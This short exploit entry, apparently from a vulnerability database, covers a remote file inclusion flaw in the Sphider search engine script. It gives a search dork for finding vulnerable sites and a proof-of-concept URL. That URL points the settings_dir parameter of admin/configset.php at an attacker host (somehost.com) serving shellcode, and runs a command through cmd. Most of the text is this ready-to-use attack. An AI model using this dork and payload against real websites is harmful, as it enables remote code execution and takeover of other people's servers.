dork: "powered by sphider" a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/